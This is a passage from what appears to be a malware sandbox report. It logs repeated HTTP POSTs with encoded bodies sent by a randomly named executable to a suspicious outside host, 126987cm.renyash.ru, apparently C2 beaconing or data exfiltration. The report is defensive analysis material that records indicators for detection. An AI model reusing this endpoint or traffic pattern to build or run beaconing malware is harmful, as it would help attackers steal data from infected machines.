                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:40.023355961 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:40.301465034 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHTBCF8G1IlTaR%2BQ2xKY%2FC65L99wzcWXkMK2I1AC7zGq0n%2B1Fk6RkaHPurrjCPvPfPsgNHAgod5faHkWcS5XBoOqIGfBQkJfLhf7grVtUK1yOiHoyAn2Tu2sn4S4hBdqb0G2Jkow"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55da2da04f797-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7835&min_rtt=1549&rtt_var=13153&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=28164&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49759 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:40.425106049 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:40.887123108 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:41.144221067 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXaz6kbpQZSyvy5%2B9itvP48075IHXDXayZEH37yv%2B3fUduwmanMK8L8pm7TaKweyNgx41LAVYSYQXbudlNxVRQsNWdC92bJDOVD4EQ7JakV93%2F%2BUbQQSnZeVqlcPhDNCV3qKNmuh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55da83b6a41a9-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3206&min_rtt=1585&rtt_var=3836&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=100322&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49760 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:41.268284082 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:41.712313890 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:41.979022026 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=51B0Fwcc%2BkVlzKAqokS5VAKBhVmeUPML5g41iHnbcTu3ru6AyGYIftmx1J9fdMguyw67yXINQqzbFhKUmCZlZ7xhuLdk49wcrU%2FV5hFzVwd76NSArXIkDpv08w%2B0wb7bIVkiKdeX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dad6ccb78ed-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=2002&rtt_var=3751&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=104241&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:42.111253977 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:42.554991007 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:42.833559036 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:42 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MqXRDAZEOJOwPEawB3N2kh8p2iKr16y04v1p8uPDVU0X3ojjGfud8F%2FgZPSapIZqzIN%2BiF09LRrORGQqURG3J1dLZG09sDOnhxQZZOtGzCF01FQ%2Bi4lsIBbMegq3%2BFH8XLfPdYt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55db2a855c3f8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2274&min_rtt=1697&rtt_var=1790&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=231232&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:42.952658892 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:43.311743975 CET | 1072 | OUT | [encoded request body]
Jan 1, 2025 21:47:43.397480011 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:43.659979105 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVx%2Fo%2FIpHDPJnMh4KgEmf1myG1A3iV1PEYu2LjeZclMxQm8Cz5kJ66fH0BplGqy8TXCmStyGOip5%2B7XXLSSqp7%2FXESvwsqz7097DrJhI127fKD9P7VoffZHi4IAvBZ7ckvrkkQDm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55db7ed905e62-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2777&min_rtt=2026&rtt_var=2263&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=181614&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:43.782020092 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:44.156883001 CET | 1072 | OUT | [encoded request body]
Jan 1, 2025 21:47:44.226103067 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:44.507297993 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BP%2FW4qOTLoFBHEXTpiln4ArVstKYVNxSZpVCXKP4Cg2ONQyatQFAy6dtjnI4sYzrBW0RXhGCozqnmJwKT9tGOR%2B9NOs%2FmXAeRmAXN5cqEL9WHwsQLVVfNFRVHFVG3TFOF1Hxc0F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dbd18788cc6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=2030&rtt_var=4207&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=92323&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49764 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:44.641060114 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:45.019877911 CET | 1072 | OUT | [encoded request body]
Jan 1, 2025 21:47:45.111927032 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49765 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:45.230207920 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:45.582808971 CET | 1788 | OUT | [encoded request body]
Jan 1, 2025 21:47:45.674057961 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:45.980638981 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:45 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=va4%2BFpFbk5kabBWN2EN39fL9nTSmUhs6JEQ9wv%2BnerA8Q1zppsBU8wln%2B6OjFFLVkElH9EvQ%2F4LM0ttQsoEb22YhTyQ5j%2BV1TAVbxibOPRv76myJm0mpCIaQW1j0V2PAqfmcLX%2FI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dc62b5d19aa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1898&rtt_var=855&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=590376&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49766 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:45.482342005 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:45.827227116 CET | 1072 | OUT | [encoded request body]
Jan 1, 2025 21:47:45.954524040 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:46.226491928 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3X2rMuLMbXy32bM4woYrFgOPfZ7H71jvCtBVwoOX71VR9RKd%2Bpad7LIzdkHDvqMx6dwSeNB7L5izWNnlcHpnXZDUUmUIMZkWSkzMsbsrIm1yBloExsQkFstOs8njSe7Swmt9BTi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dc7ef6d420b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2852&min_rtt=1616&rtt_var=3079&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=126846&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
Jan 1, 2025 21:47:46.318886042 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49767 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:46.550029039 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:46.958040953 CET | 1072 | OUT | [encoded request body]
Jan 1, 2025 21:47:46.993017912 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:47.234802008 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RUoCOWulIiAsuL2G2MiyI4gy%2BTQGHzRlloBEEfIE30AN7P%2FbDJdqOhVM2FCVFpRUTkDjaL6x5HY8FnqsDA5NavRTaq%2F7cTBpeFaAFtTnvUCAq9q5VUqV%2FQObI589zfgFSzPJ123m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dce6aed437f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3129&min_rtt=1570&rtt_var=3708&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=103921&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                27 | 192.168.2.4 | 49768 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:47:47.451222897 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:47.795994997 CET | 1072 | OUT | Data Raw: 51 54 5b 53 56 4a 5c 53 5d 56 5b 57 54 5f 51 5b 58 56 58 51 5b 53 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[SVJ\S]V[WT_Q[XVXQ[SWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^',7!" =#0-'5+U+$?P683]=56?X;'*!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:47.899492979 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:48.161886930 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNiGPtap2JY8la1GN%2Bce%2BhAVeCOixoUulGr88V%2BHdmorqg%2ByCu%2FCV37yn4uEgz8Lx50f5iDS1eBWqQOsxEHqjvQBWQccz07UlJ%2BdPSDMs%2BTYwAt4KSW9wI%2Ff6mrjZ0M011zgNJfy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dd419068c51-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3462&min_rtt=1819&rtt_var=3969&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=97541&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                28 | 192.168.2.4 | 49769 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:47:48.297028065 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:48.655471087 CET | 1072 | OUT | Data Raw: 51 53 5e 53 53 41 5c 54 5d 56 5b 57 54 58 51 58 58 50 58 5f 5b 56 57 40 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QS^SSA\T]V[WTXQXXPX_[VW@VYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_$42!]"'^'-58;V?7;W67% :)B>-#'*!^&%X*7
                                                                                                                                Jan 1, 2025 21:47:48.754667044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:49.017904997 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BPMGlA5C8TrveD0tt5F2C1reMVvgojZKrbeZvody0LlarIewm6Ax5dPInTWmw3cd0Co5iZaaiCAWyI6hNv7ABHH9YTcKeKsOcr7UEMpa%2FZYmram3lZSXlvYnGeUEXuhy3b0%2BvxQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dd96afbc470-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4415&min_rtt=2258&rtt_var=5161&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=74810&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                29 | 192.168.2.4 | 49770 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:47:49.141230106 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:49.501610041 CET | 1072 | OUT | Data Raw: 54 53 5b 5f 53 44 59 53 5d 56 5b 57 54 59 51 58 58 50 58 5c 5b 5e 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
